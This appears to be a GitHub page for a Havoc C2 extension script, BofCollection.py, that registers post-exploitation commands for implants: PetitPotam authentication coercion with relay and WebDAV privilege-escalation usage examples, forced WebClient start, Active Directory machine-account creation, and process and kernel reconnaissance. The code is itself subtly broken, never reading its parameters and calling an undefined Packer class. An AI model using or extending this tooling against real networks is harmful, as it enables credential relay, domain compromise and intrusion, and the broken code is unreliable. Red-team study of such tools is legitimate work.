-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathBofCollection.py
221 lines (148 loc) · 8.11 KB
/
BofCollection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
from havoc import Demon, RegisterCommand
from struct import pack, calcsize
def petitpotam(demonID, *param):
TaskID : str = None
demon : Demon = None
packer = Packer()
demon = Demon( demonID )
num_params = len(param)
target = ''
capture_server = ''
if num_params != 2:
demon.ConsoleWrite( demon.CONSOLE_ERROR, 'Only accepts two parameters [Capture Server, Target]' )
return False
packer.addWstr(target)
packer.addWstr(capture_server)
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to coerce target with PetitPotam")
demon.InlineExecute( TaskID, "go", f"bin/petitpotam/PetitPotam.{demon.ProcessArch}.o", packer.getbuffer(), False )
return TaskID
def smbinfo(demonID, *param):
TaskID : str = None
demon : Demon = None
packer = Packer()
demon = Demon( demonID )
num_params = len(param)
hostname = ''
if num_params != 1:
demon.ConsoleWrite( demon.CONSOLE_ERROR, 'Usage: smbinfo [Hostname]' )
return False
packer.addWstr( hostname )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, f"Tasked demon to get remote system version info")
demon.InlineExecute( TaskID, "go", f"bin/smbinfo/Smbinfo.{demon.ProcessArch}.o", packer.getbuffer(), False )
return TaskID
def startwebclient(demonID, *param):
TaskID : str = None
demon : Demon = None
demon = Demon( demonID )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, f"Tasked demon to force start the Web Client service")
demon.InlineExecute( TaskID, "go", f"bin/startwebclient/StartWebClient.{demon.ProcessArch}.o", b'', False )
return TaskID
def addmachineaccount(demonID, *param):
TaskID : str = None
demon : Demon = None
packer = Packer()
demon = Demon( demonID )
num_params = len(param)
computername = ''
password = ''
if num_params != 2:
demon.ConsoleWrite( demon.CONSOLE_ERROR, 'Usage: addmachineaccount [Computer Name] [Password]' )
return False
packer.addWstr( computername )
packer.addWstr( password )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, f"Tasked demon to use Active Directory Service Interfaces (ADSI) to add a computer account to AD.")
demon.InlineExecute( TaskID, "go", f"bin/machineaccount/AddMachineAccount.{demon.ProcessArch}.o", packer.getbuffer(), False )
return TaskID
def delmachineaccount(demonID, *param):
TaskID : str = None
demon : Demon = None
packer = Packer()
demon = Demon( demonID )
num_params = len(param)
computername = ''
if num_params != 1:
demon.ConsoleWrite( demon.CONSOLE_ERROR, 'Usage: delmachineaccount [Computer Name]' )
return False
packer.addWstr( computername )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, f"Tasked demon to use Active Directory Service Interfaces (ADSI) to delete a computer account from AD.")
demon.InlineExecute( TaskID, "go", f"bin/machineaccount/DelMachineAccount.{demon.ProcessArch}.o", packer.getbuffer(), False )
return TaskID
def getmachineaccountquota(demonID, *param):
TaskID : str = None
demon : Demon = None
demon = Demon( demonID )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to use Active Directory Service Interfaces (ADSI) to read the ms-DS-MachineAccountQuota value from AD.")
demon.InlineExecute( TaskID, "go", f"bin/machineaccount/GetMachineAccountQuota.{demon.ProcessArch}.o", b'', False )
return TaskID
def psc(demonID, *param):
TaskID : str = None
demon : Demon = None
demon = Demon( demonID )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show processes with established TCP and RDP connections.")
demon.InlineExecute( TaskID, "go", f"bin/pstools/Psc.{demon.ProcessArch}.o", b'', False )
return TaskID
def psx(demonID, *param):
TaskID : str = None
demon : Demon = None
demon = Demon( demonID )
# packer = Packer()
# num_params = param.len()
# if num_params == 1:
# packer.addstr( num_params[0] )
# TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show more detailed information from all processes running on the target system.")
# demon.InlineExecute( TaskID, "go", f"bin/pstools/Psx.{demon.ProcessArch}.o", packer.getBuffer(), False )
# else:
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show information from all processes running on the target system.")
demon.InlineExecute( TaskID, "go", f"bin/pstools/Psx.{demon.ProcessArch}.o", b'00', False )
return TaskID
# def psxx(demonID, *param):
# TaskID : str = None
# demon : Demon = None
# demon = Demon( demonID )
# TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show more detailed information from all processes running on the target system.")
# demon.InlineExecute( TaskID, "go", f"bin/pstools/Psx.{demon.ProcessArch}.o", b'', False )
def psm(demonID, *param):
TaskID : str = None
demon : Demon = None
demon = Demon( demonID )
packer = Packer()
processID : int = 0
packer.addint( processID )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show detailed information from a specific process id (loaded modules, tcp connections etc.).")
demon.InlineExecute( TaskID, "go", f"bin/pstools/Psm.{demon.ProcessArch}.o", packer.getbuffer(), False )
raise NotImplementedError
# return TaskID
def psw(demonID, *param):
TaskID : str = None
demon : Demon = None
demon = Demon( demonID )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show Window titles from processes with active Windows.")
demon.InlineExecute( TaskID, "go", f"bin/pstools/Psw.{demon.ProcessArch}.o", b'', False )
def psk(demonID, *param):
TaskID : str = None
demon : Demon = None
demon = Demon( demonID )
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show detailed information from the windows kernel and loaded driver modules.")
demon.InlineExecute( TaskID, "go", f"bin/pstools/Psk.{demon.ProcessArch}.o", b'', False )
return TaskID
# PetitPotam
RegisterCommand(petitpotam, "", "petitpotam", "Coerce Windows hosts to authenticate to other machines via MS-EFSRPC", 0, "[Capture Server] [Target]", """
SMB Relay Attack : petitpotam KALI DC2019
WebDAV LPE Attack : petitpotam KALI@80/nop localhost
WebDAV LPE w/SOCKS and rportfwd : petitpotam localhost@80/nop localhost
""")
# SMBInfo
RegisterCommand(smbinfo, "", "smbinfo", "Gather remote system version info using the NetWkstaGetInfo API.", 0, "[Hostname]", "CASTELBLACK")
# Web Client
RegisterCommand(startwebclient, "", "start_webclient", "Force start the Web Client service.", 0, "", "")
# Machine Account
RegisterCommand(addmachineaccount, "", "add_machine_account", "Add a computer account to the Active Directory domain.", 0, "[Computer Name] [Password]", "PIVOT n3rdl0l")
RegisterCommand(delmachineaccount, "", "del_machine_account", "Delete a computer account to the Active Directory domain.", 0, "[Computer Name]", "PIVOT")
RegisterCommand(getmachineaccountquota, "", "get_machine_account_quota", "Read the ms-DS-MachineAccountQuota value from AD", 0, "", "")
# PS Tools (Psx, Psc, Psm, Psw, Psk)
RegisterCommand(psc, "", "psc", "Show processes with established TCP and RDP connections.", 0, "", "")
RegisterCommand(psx, "", "psx", "Show information from all processes running on the target system.", 0, "", "")
# RegisterCommand(psxx, "", "psxx", "Get detailed information from processes with established TCP and RDP connections.", 0, "", "")
RegisterCommand(psw, "", "psw", "Show Window titles from processes with active Windows.", 0, "", "")
RegisterCommand(psm, "", "psm", "Show detailed information from a specific process id (loaded modules, tcp connections etc.).", 0, "[process id]", "4932")
RegisterCommand(psk, "", "psk", "Show detailed information from the windows kernel and loaded driver modules.", 0, "", "")